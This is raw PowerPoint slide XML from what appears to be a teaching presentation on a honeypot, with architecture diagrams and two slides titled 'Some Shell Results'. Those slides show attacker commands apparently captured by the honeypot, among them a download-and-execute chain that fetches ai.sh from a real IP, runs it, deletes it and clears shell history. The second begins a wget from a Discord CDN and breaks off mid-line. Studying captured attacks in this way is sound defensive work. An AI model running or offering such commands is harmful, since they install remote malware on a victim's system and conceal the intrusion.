          <a:xfrm>
            <a:off x="6996793" y="1733210"/>
            <a:ext cx="1690007" cy="227785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Container(s)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Cloud 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB150F5C-BC77-3946-A5BD-509D6A9B3D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482148" y="1883307"/>
            <a:ext cx="2567708" cy="1977656"/>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ightning Bolt 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC4D581-9EE5-1E46-9246-E6F2D12B2640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18494694">
            <a:off x="3099087" y="2526018"/>
            <a:ext cx="739502" cy="742274"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBol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A81BBA3B-F763-1548-893B-CEFB757D29B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691685" y="2214735"/>
            <a:ext cx="1280160" cy="50292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Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Left Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3275E3-047E-F04B-BBD4-7C9582CA9CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5704159" y="3081201"/>
            <a:ext cx="1280160" cy="50292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Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364AEEE7-75BD-CD48-9FD0-0B0B135E6200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3989204" y="2264116"/>
            <a:ext cx="1690007" cy="132000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Honey Pot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32699851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be 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56ADB2F7-56D0-9B4E-9469-3FDFA5EB19D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849451" y="1657350"/>
            <a:ext cx="914400" cy="914400"/>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5BCCFEEA-0683-F24A-BCA8-12E1EA834077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2332414"/>
            <a:ext cx="18288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a:t>ContainerThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9859B8-0F71-F84F-A1FA-823DD0276E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3533942"/>
            <a:ext cx="18288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a:t>ListenThead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A75F974-0CA0-604A-996F-69911EBA7DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1086998"/>
            <a:ext cx="1828799" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6000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a:t>OneWayThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5325491-9C40-5C4C-AABD-96D9FA996316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2734651" y="1086998"/>
            <a:ext cx="1828800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59259"/>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a:t>OneWayThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Cloud 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B377969A-51D6-3446-9E83-6DAC606BA234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582929" y="2374468"/>
            <a:ext cx="1828801" cy="9144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E8DDA3EA-07AF-6A41-A322-5D22691001FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2410206" y="2831668"/>
            <a:ext cx="1247394" cy="1159474"/>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40B04C44-1A43-CE4C-97EA-E2F8E601B2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="0"/>
            <a:endCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4572000" y="3246814"/>
            <a:ext cx="0" cy="287128"/>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3E25A5E9-D27F-CD44-A551-50F2B6DAAA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3749040" y="1840230"/>
            <a:ext cx="822960" cy="492184"/>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35AEE5BF-E17F-B343-92E8-C7EE5D67B3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4572000" y="1840230"/>
            <a:ext cx="768096" cy="492184"/>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11135F56-526A-F546-9C4A-D2D514A0E827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2410206" y="1544198"/>
            <a:ext cx="324445" cy="1287470"/>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9A3B6C9D-7EBD-CD4F-9DF0-29337D821660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400799" y="1544198"/>
            <a:ext cx="448652" cy="684652"/>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33" name="Can 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1463E0-F548-7E43-8727-BCB82E04517D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4106251" y="191819"/>
            <a:ext cx="914400" cy="91440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DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF60F5D-BD83-B849-B3EB-EE9A3FA034B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3749040" y="1106219"/>
            <a:ext cx="814411" cy="1508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ED00E548-1824-9B49-8357-EF295FA6500C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4563451" y="1106219"/>
            <a:ext cx="776645" cy="1369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9F8BEF90-F635-BD44-A460-F9B9EF47B151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5486400" y="2228850"/>
            <a:ext cx="1363051" cy="5607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06303456-DF05-5A4C-9FC8-1A0D929519AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948731" y="4056502"/>
            <a:ext cx="785920" cy="0"/>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9994D77C-021D-514E-828F-3ABEFB107E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870104" y="3678468"/>
            <a:ext cx="943173" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19750735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760D-6CEF-C949-BFA5-508736257861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Shell Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6241D01-0FC4-384D-90FB-C297B32D7B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://185.244.25.145/love/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ai.sh;chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 777 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ai.sh;sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ai.sh;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -rf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ai.sh;history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6636222C-D77D-3C4E-A9B1-C38856D4A2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A593AF-C284-2146-B699-79EB79199023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C968FBCD-EEF2-2748-B5E5-C9D4CA09C333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25805762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C4B00-CA9D-F042-AF83-BF8E60E6BAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Shell Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E9D9B4-D12E-3C44-A6BF-3CB9019EC23A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> apt-get update -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y;sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> apt-get install python3.6 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y;sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y;sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cdn.discordapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
